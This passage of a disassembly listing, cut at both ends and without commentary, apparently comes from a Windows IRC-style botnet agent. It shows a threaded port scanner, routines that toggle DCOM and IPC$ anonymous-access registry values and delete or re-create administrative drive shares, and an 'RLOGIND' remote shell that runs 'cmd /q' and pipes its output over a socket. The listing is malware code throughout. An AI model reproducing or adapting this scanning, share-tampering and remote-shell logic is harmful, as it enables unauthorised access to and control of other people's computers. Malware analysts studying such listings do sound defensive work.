loc_40FCB1: ; CODE XREF: sub_40FC7C+21�j
xor eax, eax
jmp short loc_40FCBA
; ---------------------------------------------------------------------------
loc_40FCB5: ; CODE XREF: sub_40FC7C+1D�j
; sub_40FC7C+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40FCBA: ; CODE XREF: sub_40FC7C+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_40FCD3
; ---------------------------------------------------------------------------
loc_40FCC5: ; CODE XREF: sub_40FC7C+F�j
mov ecx, dword_42C31C[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40FCD3: ; CODE XREF: sub_40FC7C+47�j
test eax, eax
jnz short loc_40FCE2
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_40FC86
jmp short loc_40FCF0
; ---------------------------------------------------------------------------
loc_40FCE2: ; CODE XREF: sub_40FC7C+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
call off_42C320[eax*4]
pop ecx
loc_40FCF0: ; CODE XREF: sub_40FC7C+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_40FD04
push [ebp+arg_0]
call sub_40FBDB
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FD04: ; CODE XREF: sub_40FC7C+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40FC7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40FD09 proc near ; DATA XREF: sub_40FDCB+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_435954 ; htons
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_435808 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40FDB9
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_4357C0 ; connect
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_4366AC[ecx], esi
jz short loc_40FDB9
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_435888 ; inet_ntoa
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_47BF80
push edi
call sub_414415
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_4056BF
push edi
call sub_401EFF
add esp, 28h
loc_40FDB9: ; CODE XREF: sub_40FD09+55�j
; sub_40FD09+76�j
push esi
call dword_435914 ; closesocket
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_40FD09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_40FDCB proc near ; DATA XREF: sub_4089DC+265B�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, ds:dword_420000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40FDF8: ; CODE XREF: sub_40FDCB+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_414415
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_4364A0
push eax
call sub_4144A0
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_40FD09
push edi
push edi
call ds:dword_42000C ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_40FE61
jmp short loc_40FE5C
; ---------------------------------------------------------------------------
loc_40FE58: ; CODE XREF: sub_40FDCB+94�j
push 32h
call esi ; Sleep
loc_40FE5C: ; CODE XREF: sub_40FDCB+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_40FE58
loc_40FE61: ; CODE XREF: sub_40FDCB+89�j
push [ebp+74h+arg_0]
call ds:dword_42003C ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
push [ebp+74h+var_1C]
call dword_4358D8 ; htonl
inc eax
push eax
call dword_43592C ; htonl
mov [ebp+74h+var_1C], eax
jmp loc_40FDF8
sub_40FDCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FE91 proc near ; CODE XREF: sub_4104D1+8�p
; sub_4104EF+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_435968, edi
jnz loc_40FFC4
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_435930 ; RegOpenKeyExA
test eax, eax
jnz short loc_40FF1D
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_40FED5: ; CODE XREF: sub_40FE91+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FED5
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4357EC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40FF05
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_40FF0A
; ---------------------------------------------------------------------------
loc_40FF05: ; CODE XREF: sub_40FE91+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_40FF0A: ; CODE XREF: sub_40FE91+72�j
push eax
call sub_414415
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358E4 ; RegCloseKey
jmp short loc_40FF30
; ---------------------------------------------------------------------------
loc_40FF1D: ; CODE XREF: sub_40FE91+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_414415
pop ecx
pop ecx
loc_40FF30: ; CODE XREF: sub_40FE91+8A�j
cmp [ebp+arg_C], edi
jnz short loc_40FF4F
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_40FF4F: ; CODE XREF: sub_40FE91+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_435930 ; RegOpenKeyExA
test eax, eax
jnz short loc_40FFBD
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_4357EC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40FFA5
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_40FFAA
; ---------------------------------------------------------------------------
loc_40FFA5: ; CODE XREF: sub_40FE91+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_40FFAA: ; CODE XREF: sub_40FE91+112�j
push eax
call sub_414415
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358E4 ; RegCloseKey
jmp short loc_40FFD7
; ---------------------------------------------------------------------------
loc_40FFBD: ; CODE XREF: sub_40FE91+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_40FFC9
; ---------------------------------------------------------------------------
loc_40FFC4: ; CODE XREF: sub_40FE91+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_40FFC9: ; CODE XREF: sub_40FE91+131�j
lea eax, [ebp+var_214]
push eax
call sub_414415
pop ecx
pop ecx
loc_40FFD7: ; CODE XREF: sub_40FE91+12A�j
cmp [ebp+arg_C], edi
jnz short loc_40FFF6
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_40FFF6: ; CODE XREF: sub_40FE91+149�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
cmp dword_435990, edi
pop ecx
jnz loc_410173
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_410019: ; CODE XREF: sub_40FE91+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_435908
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_4100B8
cmp eax, 0EAh
jz short loc_4100B8
xor esi, esi
loc_410047: ; CODE XREF: sub_40FE91+220�j
push off_42C378[esi]
push edi
call sub_407114
pop ecx
pop ecx
push off_42C378[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_41006C
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_410071
; ---------------------------------------------------------------------------
loc_41006C: ; CODE XREF: sub_40FE91+1D2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to delete '%s' share."
loc_410071: ; CODE XREF: sub_40FE91+1D9�j
push 200h
push eax
call sub_41466D
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41009E
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_41009E: ; CODE XREF: sub_40FE91+1F1�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_410047
jmp loc_410150
; ---------------------------------------------------------------------------
loc_4100B8: ; CODE XREF: sub_40FE91+1AB�j
; sub_40FE91+1B2�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_410147
loc_4100C7: ; CODE XREF: sub_40FE91+2B2�j
mov edi, [esi]
push edi
call sub_41597E
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41013C
push edi
call sub_407028
push eax
push 0
call sub_407114
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_4100FC
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_410101
; ---------------------------------------------------------------------------
loc_4100FC: ; CODE XREF: sub_40FE91+262�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%S' share."
loc_410101: ; CODE XREF: sub_40FE91+269�j
push 200h
push eax
call sub_41466D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41012F
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_41012F: ; CODE XREF: sub_40FE91+282�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
pop ecx
loc_41013C: ; CODE XREF: sub_40FE91+245�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_4100C7
xor edi, edi
loc_410147: ; CODE XREF: sub_40FE91+230�j
push [ebp+var_8]
call dword_435840
loc_410150: ; CODE XREF: sub_40FE91+222�j
cmp [ebp+var_10], 0EAh
jz loc_410019
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_414415
pop ecx
pop ecx
pop ebx
jmp short loc_410186
; ---------------------------------------------------------------------------
loc_410173: ; CODE XREF: sub_40FE91+178�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_414415
pop ecx
pop ecx
loc_410186: ; CODE XREF: sub_40FE91+2E0�j
cmp [ebp+arg_C], edi
jnz short loc_4101A4
push edi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_4101A4: ; CODE XREF: sub_40FE91+2F8�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_40FE91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4101B8 proc near ; CODE XREF: sub_4104EF:loc_41052D�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_435968, ebx
push esi
jnz loc_4102E7
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_435930 ; RegOpenKeyExA
test eax, eax
jnz short loc_410244
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 59h
lea edx, [eax+1]
loc_4101FC: ; CODE XREF: sub_4101B8+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4101FC
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4357EC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_41022C
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_410231
; ---------------------------------------------------------------------------
loc_41022C: ; CODE XREF: sub_4101B8+6B�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_410231: ; CODE XREF: sub_4101B8+72�j
push eax
call sub_414415
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358E4 ; RegCloseKey
jmp short loc_410257
; ---------------------------------------------------------------------------
loc_410244: ; CODE XREF: sub_4101B8+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_414415
pop ecx
pop ecx
loc_410257: ; CODE XREF: sub_4101B8+8A�j
cmp [ebp+arg_C], ebx
jnz short loc_410276
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_410276: ; CODE XREF: sub_4101B8+A2�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_435930 ; RegOpenKeyExA
test eax, eax
jnz short loc_4102E0
push 4
lea eax, [ebp+var_8]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_4357EC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_4102C8
push offset aSecureFailed_5 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_4102CD
; ---------------------------------------------------------------------------
loc_4102C8: ; CODE XREF: sub_4101B8+107�j
push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_4102CD: ; CODE XREF: sub_4101B8+10E�j
push eax
call sub_414415
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358E4 ; RegCloseKey
jmp short loc_4102FA
; ---------------------------------------------------------------------------
loc_4102E0: ; CODE XREF: sub_4101B8+E3�j
push offset aSecureFailed_6 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_4102EC
; ---------------------------------------------------------------------------
loc_4102E7: ; CODE XREF: sub_4101B8+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_4102EC: ; CODE XREF: sub_4101B8+12D�j
lea eax, [ebp+var_220]
push eax
call sub_414415
pop ecx
pop ecx
loc_4102FA: ; CODE XREF: sub_4101B8+126�j
cmp [ebp+arg_C], ebx
jnz short loc_410319
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_410319: ; CODE XREF: sub_4101B8+145�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
cmp dword_435990, ebx
pop ecx
jnz loc_41048C
push edi
xor esi, esi
mov edi, 200h
loc_41033A: ; CODE XREF: sub_4101B8+1EF�j
push dword_42C37C[esi]
push off_42C378[esi]
push ebx
call sub_4070A9
add esp, 0Ch
push off_42C378[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_410366
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_41036B
; ---------------------------------------------------------------------------
loc_410366: ; CODE XREF: sub_4101B8+1A5�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_41036B: ; CODE XREF: sub_4101B8+1AC�j
push edi
push eax
call sub_41466D
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_410394
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_410394: ; CODE XREF: sub_4101B8+1C0�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_41033A
call ds:dword_420124 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_410474
loc_4103BC: ; CODE XREF: sub_4101B8+2B6�j
test byte ptr [ebp+var_4], 1
jz loc_410469
cmp bl, 41h
jz loc_410469
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41466D
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_41466D
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_435794 ; GetDriveTypeA
cmp eax, 3
jnz short loc_410469
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_4070A9
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_41042D
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_410432
; ---------------------------------------------------------------------------
loc_41042D: ; CODE XREF: sub_4101B8+26C�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_410432: ; CODE XREF: sub_4101B8+273�j
push edi
push eax
call sub_41466D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41045C
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_41045C: ; CODE XREF: sub_4101B8+288�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
pop ecx
loc_410469: ; CODE XREF: sub_4101B8+208�j
; sub_4101B8+211�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_4103BC
loc_410474: ; CODE XREF: sub_4101B8+1FE�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_414415
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_41049F
; ---------------------------------------------------------------------------
loc_41048C: ; CODE XREF: sub_4101B8+174�j
lea eax, [ebp+var_220]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_414415
pop ecx
pop ecx
loc_41049F: ; CODE XREF: sub_4101B8+2D2�j
cmp [ebp+arg_C], ebx
jnz short loc_4104BD
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_4104BD: ; CODE XREF: sub_4101B8+2EA�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_4101B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4104D1 proc near ; CODE XREF: sub_4104D1+1C�j
; DATA XREF: sub_40E6BB+3B4�o
push 1
push 0
push 0
push 0
call sub_40FE91
add esp, 10h
push dword_42C374
call ds:dword_420000 ; Sleep
jmp short sub_4104D1
sub_4104D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4104EF proc near ; DATA XREF: sub_4089DC+4E99�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_41052D
call sub_40FE91
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41052D: ; CODE XREF: sub_4104EF+35�j
call sub_4101B8
loc_410532: ; CODE XREF: sub_4104EF+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_41255E
pop ecx
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_4104EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410547 proc near ; CODE XREF: sub_4107C5+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_58]
rep stosd
lea edi, [ebp+var_14]
stosd
xor esi, esi
stosd
stosd
stosd
mov eax, [ebp+arg_0]
mov edi, ds:dword_4200E0
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_4], esi
mov [ebp+var_58], 44h
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_420110 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz short loc_4105F7
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_4366A8[eax], ecx
call ds:dword_42003C ; CloseHandle
jmp short loc_41060D
; ---------------------------------------------------------------------------
loc_4105F7: ; CODE XREF: sub_410547+8E�j
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_401F73
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_41060D: ; CODE XREF: sub_410547+AE�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_410547 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410613 proc near ; DATA XREF: sub_4108C1+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, ds:dword_42008C
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_410675
; ---------------------------------------------------------------------------
loc_41062C: ; CODE XREF: sub_410613+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_41065E
loc_410637: ; CODE XREF: sub_410613+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_41064E
cmp dl, 0Dh
jz short loc_41064E
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_41064E: ; CODE XREF: sub_410613+2B�j
; sub_410613+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_410637
loc_41065E: ; CODE XREF: sub_410613+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_43589C ; send
test eax, eax
jle short loc_41068C
loc_410675: ; CODE XREF: sub_410613+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx ; ReadFile
test eax, eax
jnz short loc_41062C
loc_41068C: ; CODE XREF: sub_410613+60�j
mov esi, ds:dword_420008
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_4106A8
call esi ; RtlGetLastWin32Error
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_401F73
pop ecx
pop ecx
loc_4106A8: ; CODE XREF: sub_410613+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_410613 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4106B0 proc near ; DATA XREF: sub_4108C1+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_4107A2
; ---------------------------------------------------------------------------
loc_4106CD: ; CODE XREF: sub_4106B0+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_4106DA
dec [ebp+74h+var_10]
jmp loc_4107A5
; ---------------------------------------------------------------------------
loc_4106DA: ; CODE XREF: sub_4106B0+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_41078D
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_410744
cmp al, 7Fh
jz short loc_410744
cmp al, 3
jnz short loc_410705
push ebx
push ebx
call ds:dword_420128 ; GenerateConsoleCtrlEvent
jmp short loc_41076B
; ---------------------------------------------------------------------------
loc_410705: ; CODE XREF: sub_4106B0+49�j
cmp al, 15h
jnz short loc_410727
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_410757
; ---------------------------------------------------------------------------
loc_410727: ; CODE XREF: sub_4106B0+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_410758
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_410757
; ---------------------------------------------------------------------------
loc_410744: ; CODE XREF: sub_4106B0+41�j
; sub_4106B0+45�j
cmp esi, ebx
jbe short loc_41076E
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_410757: ; CODE XREF: sub_4106B0+75�j
; sub_4106B0+92�j
pop ecx
loc_410758: ; CODE XREF: sub_4106B0+84�j
push ebx
push ecx
